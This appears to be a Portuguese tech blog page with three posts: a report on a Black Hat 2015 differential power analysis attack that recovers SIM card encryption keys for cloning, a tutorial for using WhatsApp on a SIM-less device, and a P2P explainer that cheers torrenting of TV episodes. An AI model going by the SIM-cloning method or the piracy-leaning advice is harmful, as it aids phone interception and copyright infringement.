Mas Prof. Yu-Yu, da Shanghai Jiao Tong University, tem mostrado agora que os cartões SIM 3G/4G, usando AES de 128 bits, podem ser quebrados – portanto, o pesadelo de clonagem de cartão SIM poderia se tornar realidade (vide este link).

 O acesso às chaves de criptografia SIM é um foco importante para a aplicação da Lei, e destacou-se no início do ano quando os agentes de certa Autoridade foram suspeitos de roubar bilhões de chaves de criptografia do fabricante holandês de cartões Gemalto.

Essas chaves permitiriam o acesso a mensagens de voz e dados nos telefones.

Em sua apresentação de Black Hat USA 2015 nesta semana, Prof. Yu-Yu descreveu como um método de análise diferencial de alimentação/tensão que recupera chaves de criptografia de cartões SIM, o que permite serem então clonados. No geral, demora de 10 a 40 minutos para recuperar a chave e seu método foi bem-sucedido em oito dos fabricantes mais populares de cartão SIM.

Ele usa, basicamente, um osciloscópio para capturar as mudanças de energia e um analisador de protocolo MP300-SC2, juntamente com um PC para analisar a criptografia. O trabalho usa Análise Diferencial de Alimentação (DPA – Differential Power Analysis). Com Análise de Alimentação Simples (SPA – Simple Power Analysis) monitoramos a tensão consumida pelo processador e isto pode dar dicas sobre o conteúdo dos seus registradores e BUSes.

Como usar o WhatsApp sem um número de telefone

Como usar o WhatsApp sem um número de telefone

Como usar o WhatsApp sem um número de telefone

No entanto, se você não quiser usar um número de telefone, existem maneiras de você se cadastrar no WhatsApp sem a necessidade de colocar o numero de telefone.

Ao tentar instalar o WhatsApp, uma das primeiras coisas que o aplicativo nos pede é um número de telefone para o qual mandar um código de verificação. Todas as contas deste serviço estão conectadas a um número, e tê-lo é um requisito imprescindível para poder fazer funcionar o aplicativo. Contudo, isso não significa que o cartão precise estar no dispositivo em que deseja usar o WhatsApp.

Se estiver utilizando um smartphone sem cartão SIM e quiser usar o WhatsApp neste dispositivo, você tem a opção de fazê-lo usando sua conta já criada no app ou usando um número de telefone, que esteja habilitado para receber mensagens SMS e ligações e não esteja registrado no aplicativo. Com esses métodos é possível fazer com que seu smartphone ou tablet sem cartão SIM se transforme numa extensão de uma conta já criada, podendo usar os dois dispositivos ao mesmo tempo ou simplesmente habilitá-lo para usar o App. Para isso, siga os tutoriais abaixo:

Com um número de telefone

Para começar este processo, você deve dispor de um número de telefone que esteja habilitado para receber mensagens SMS e ligações e não esteja registrado no App para propósitos de verificação e conexão à internet por wi-fi ou cabo. Siga os passos abaixo para instalar o WhatsApp num dispositivo sem SIM card.

  • Conecte o dispositivo à internet;
  • Instale o aplicativo através da Play Store ou pelo botão no final deste artigo;
  • Abra o aplicativo;
  • Aceite os termos e condições;
whatsappagree
Aceite os termos e condições do aplicativo e insira um numero de telefone válido para instalar o App
  • Insira o número de telefone que deseja usar, lembrando que o mesmo deve poder receber mensagens SMS e ligações. A mensagem SMS pode demorar até 10 minutos para chegar ao seu telefone; se o processo não acontecer em 15 min, clique em “ME LIGUE” para verificar o número através de uma ligação;
  • Insira o código de verificação e voilá: o WhatsApp está prontinho para ser usado.

A verificação só é necessária uma vez desde que o aplicativo não seja desinstalado, portanto uma vez que você começou a usar o WhatsApp, não precisa mais se preocupar com o número de telefone.

whatsapptry
Verifique o seu número através de uma mensagem SMS ou ligação

Com uma conta já existente

  • Entre no Chrome no dispositivo sem cartão SIM e acesse as configurações na parte superior direita;
  • Marque a opção Versão para desktop;
whatsappnavegador
Selecione a versão de desktop do Chrome e entre na página do WhatsApp Web.
  •  Agora, no mesmo dispositivo, vá até a página oficial do WhatsApp Web, onde encontrará um código QR;
  •  Abra o aplicativo do WhatsApp com o celular que possui o cartão SIM, vá até as configurações do canto superior direito e selecione ‘WhatsApp Web’. Em seguida, faça a leitura do código QR que aparece no outro telefone;
  • O dispositivo sem número mostrará agora todas a suas conversas e contatos, e você poderá utilizar o WhatsApp da mesma maneira que faria num computador.

Fonte: www.androidpit.com.br

O que é P2P e como ela funciona?

Alguma vez você já parou para pensar como aquele último episódio da sua série favorita foi parar na sua casa e você pode assistir? Veja aqui como funciona a incrível tecnologia das redes P2P, utilizada, por exemplo, pelos programas de torrents.

Primeiro vamos explicar o que significa esse nome/sigla: P2P significa Peer to Peer e o 2 da sigla é um trocadilho com a palavra two (2 em inglês), já em português, significa par a par.

O nome se refere ao formato à disposição dos computadores interligados à rede, onde cada computador conectado realiza as funções de cliente e servidor ao mesmo tempo, dessa forma, tudo é descentralizado, sem um único servidor centralizado que detenha o arquivo e precisa se encarregar de enviar todos os milhares de pedidos ao mesmo tempo.

Ficou complicado entender o que é cliente e servidor? Eu explico: Cliente é o nome dado ao pc que pede algo à rede, e servidor aquele que envia o pedido. Como não existe um servidor dedicado, veja que nenhum servidor de torrent armazena sequer um arquivinho, os arquivos estão na sua máquina, na minha, na do seu vizinho, naquela do japonês enlouquecido que só estuda, enfim, em qualquer local do mundo. Aqui está a genialidade deste tipo de conexão: Não há uma única fonte para o seu download (como acontece quando você baixa algo de um site), há milhões de fontes só esperando sua conexão.

O serviço P2P cria uma rede virtual entre as máquinas conectadas no momento e vasculha o HD do usuário atrás da música, vídeo ou qualquer outro documento que a pessoa esteja baixando. Além disso, o que torna a rede P2P tão eficiente é que você pode começar a baixar de uma fonte, e no momento em que esta fonte desligar sua máquina e interromper a conexão, o download recomeçará de onde parou, a partir dos dados cedidos por um outro usuário, se este novo usuário também desconectar, o processo se repetirá, ad eternum, até você completar o download.

À esquerda uma conexão convencional, à direita, uma conexão P2P

À esquerda uma conexão convencional, à direita, uma conexão P2P

Outro ponto positivo: o número de conexões efetivadas pelo sistema varia de acordo com a sua largura de banda, ou seja, quanto mais velocidade de internet, mais conexões com outros usuários, e, assim, mais velocidade de download. A rede P2P não limita a velocidade de suas transferências, somente se você quiser que ela faça isso. Mas e como funciona essa coisa de baixar um pouco de um, um pouco de outro, etc. não dá erro? Não, pois neste tipo de conexão, os arquivos a serem transferidos são divididos em pequenos pedaços e então compartilhados. Os pedaços são sempre os mesmos para a música X, ou jogo Y. Funciona assim: Você baixa um desses pedaços de arquivo e, logo após, você imediatamente passa a distribuí-lo aos outros usuários que estão fazendo o download do mesmo arquivo. Assim, evitam-se gargalos na transmissão dos dados e permite que mesmo aquela pessoa com uma conexão lenta de transferência consiga repassar o arquivo para milhares de pessoas.

Exemplificando um pouco mais: Com esse sistema de envio um usuário pode baixar até a parte 50 do seu vizinho de prédio, a parte 3453 de um mexicano e os últimos 10% de um russo louco da vodka, por exemplo. No final, o programa que você usar para baixar os arquivos irá juntar tudo em ordem e voilá: seu download estará completo na sua máquina esperando pela execução.

Veja que estou fazendo um download em minha máquina. No total o arquivo tem quase 10gb, mas veja minhas conexões: Estou pegando dados de brasileiros, japoneses, americanos, canadenses, italianos, argentinos, etc. tudo ao mesmo tempo, e é isso que me permite uma maior velocidade. De alguns eu copio o que preciso mais rapidamente, de outros, bem devagarinho, no final, a soma dá uma boa velocidade. Aaah, e notem que eu também estou enviando o mesmo arquivo (os 13% que eu já tenho) para os outros usuários que precisam destes pedaços. Deu para entender? Eu estou sendo neste momento cliente e servidor. É um verdadeiro trabalho de formiguinha, no qual a cooperação é de suma importância.

E para exemplificar o que estávamos falando antes, sobre repartir o arquivo em pedaços, este que estou baixando tem 1241 partes de 8mb cada.

Diversas formas de compartilhamento operam neste tipo de conexão: Kademlia, Torrent, Gnutela, Kad Network, SoulSeek, etc. e ela não é nova. Se você, por exemplo, já usou o Kazaa, o Emule, Ares, etc. já esteve conectado à rede P2P sem nem saber. Ela surgiu em 1999, quando o estudante Shawn Fanning lançou o Napster, inaugurando esse novo tipo de conexão e dando o pontapé inicial na era do compartilhamento de conteúdo em grande escala.

RELACIONADO A conturbada história do Pirate Bay Entre os programas que operam este tipo de conexão podemos citar vários, que desde 1999 fazem ou já fizeram muito sucesso – e polêmica (clique no link à direita e leia sobre os problemas legais enfrentados pelo The Pirate Bay). Alguns se conectavam em mais de uma rede, por exemplo, como o Emule, que se conectava à rede P2P e Kad, e foi muito popular no Brasil lá por 2003 ~ 2005, assim como o Kazaa, etc. No entanto, hoje, o mais seguro e eficiente é sem dúvidas, algum cliente torrent, como o uTorrent, programinha de menos de 1MB que permite aos seus usuários a conexão entre milhares de pc’s pelo mundo e o tráfego ilimitado de dados, com segurança e agilidade. O download pode ser feito na página oficial do desenvolvedor, clicando aqui. Depois que você instalar o programinha em sua máquina visite o tracker (local onde estão catalogados os torrents) para buscar algo a ser baixado. O melhor, na minha humilde opinião, pode ser acessado clicando aqui.

E os benefícios da rede não se restringem somente ao compartilhamento de arquivos e mídias digitais. Você sabe, por exemplo, o porquê do Skype realizar de forma tão barata uma ligação telefônica de São Paulo para Berlim, na Alemanha? É que os dados de voz são transmitidos através de uma rede P2P, que é infinitamente mais barata de ser mantida e operada do que uma rede telefônica, seja ela conectada somente por fios, ou com satélites.

Convencidos de que o P2P é um bem para a humanidade? Então, aos downloads, e por fim, algo MUITO importante: Não deixe de compartilhar aquilo que você baixou de alguém, só assim a internet sobrevive. Compartilhar é amor <3